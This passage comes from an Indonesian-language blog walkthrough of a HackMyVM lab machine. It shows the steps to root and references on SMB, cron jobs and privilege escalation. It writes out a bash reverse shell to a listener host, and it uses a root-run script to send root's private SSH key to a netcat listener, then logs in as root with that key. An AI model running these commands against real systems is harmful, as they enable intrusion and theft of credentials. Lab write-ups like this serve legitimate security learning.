<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">echo</span> <span class="s2">"/bin/bash -i &gt;&amp; /dev/tcp/192.168.56.1/12345 0&gt;&amp;1"</span> <span class="o">&gt;</span> kek.sh 
<span class="nv">$ </span><span class="nb">chmod</span> +x kek.sh
</code></pre></div></div>
<p>lalu listening dengan <strong>ncat</strong>.</p>

<p><img src="https://i.postimg.cc/2yX5WwZs/image.png" alt="ralph" /></p>

<h2 id="rooting-the-system">rooting the system</h2>

<p><img src="https://i.postimg.cc/wjD6xHw8/image.png" alt="root" /></p>

<p>ketika saya lihat isi dari <em>getfile.py</em>. ternyata HEHEHE</p>

<p><img src="https://i.postimg.cc/Zqc43Hkw/image.png" alt="damn" /></p>

<p>tidak ada permission kawand. jadi saya eksekusi aja daripada kelamaan langsung saya listening ke port 9999 menggunakan <strong>nc</strong> dan file path menggunakan <strong>id_rsa</strong> dari root. kalau misal kita dapat respon berarti
<strong>id_rsa</strong> tersedia dalam directory root.</p>

<p><img src="https://i.postimg.cc/kgxvQ1J3/image.png" alt="test" /></p>

<p>lalu saya ketik command seperti dibawah ini</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sed</span> <span class="s1">'1,9d'</span> id_root <span class="o">&gt;</span> id_root.new <span class="c"># untuk menghilangkan header</span>
<span class="nv">$ </span><span class="nb">mv </span>id_root.new id_root
<span class="nv">$ </span><span class="nb">chmod </span>400 id_root <span class="c"># read only</span>
<span class="nv">$ </span>ssh <span class="nt">-i</span> id_root root@localhost
</code></pre></div></div>
<p>setelah itu, read the root flag!</p>

<p><img src="https://i.postimg.cc/4Nrg01Dx/image.png" alt="damnya" /></p>

<h2 id="referensi">Referensi</h2>

<ul>
  <li><a href="https://www.offensive-security.com/metasploit-unleashed/smb-login-check/">https://www.offensive-security.com/metasploit-unleashed/smb-login-check/</a></li>
  <li><a href="https://linoxide.com/howto-mount-smb-filesystem-using-etcfstab/">https://linoxide.com/howto-mount-smb-filesystem-using-etcfstab/</a></li>
  <li><a href="https://cifs.com/">https://cifs.com/</a></li>
  <li><a href="https://nepcodex.com/2021/06/upgrade-to-an-intelligent-reverse-shell/">https://nepcodex.com/2021/06/upgrade-to-an-intelligent-reverse-shell/</a></li>
  <li><a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation#path">https://book.hacktricks.xyz/linux-hardening/privilege-escalation#path</a></li>
</ul>

  </div>
  <div class="post-info" style="padding-top: 25px">
    <div class="post-date">
      2022-05-01.
    </div>
    <div class="post-categories">
      <span></span>
      
      <a href="/category/hackmyvm" class="post-category">hackmyvm</a>
      
    </div>
    <div class="post-tags">
      <span></span>
      
      <a href="/tag/smb-login-check" class="post-tag">smb-login-check</a>
      
      <a href="/tag/cifs" class="post-tag">cifs</a>
      
      <a href="/tag/cronjob" class="post-tag">cronjob</a>
      
      <a href="/tag/profile-d-writable" class="post-tag">profile.d-writable</a>
      
      <a href="/tag/ssh" class="post-tag">ssh</a>
      
    </div>
    <div class="post-tools">
      
      <div>
        <span></span><a href="/2022/05/08/htb-late">HackTheBox: Late</a>
      </div>
      
      
      <div>
        <span></span><a href="/2021/09/16/hmv-chronos">HackMyVM: Chronos</a>
      </div>
      
    </div>
    
  </div>
</article>

    </main>
    <footer class="container-footer">
      <div class="footer-copyright">
  <span class="footer-copyright-text float-left">Copyright &copy; 2022.  sharpicx.</span>
  <span class="footer-copyright-text float-right">
    Powered by <a href="https://jekyllrb.com/">Jekyll</a>
  </span>
</div>

    </footer>
  </div>
</body>
</html>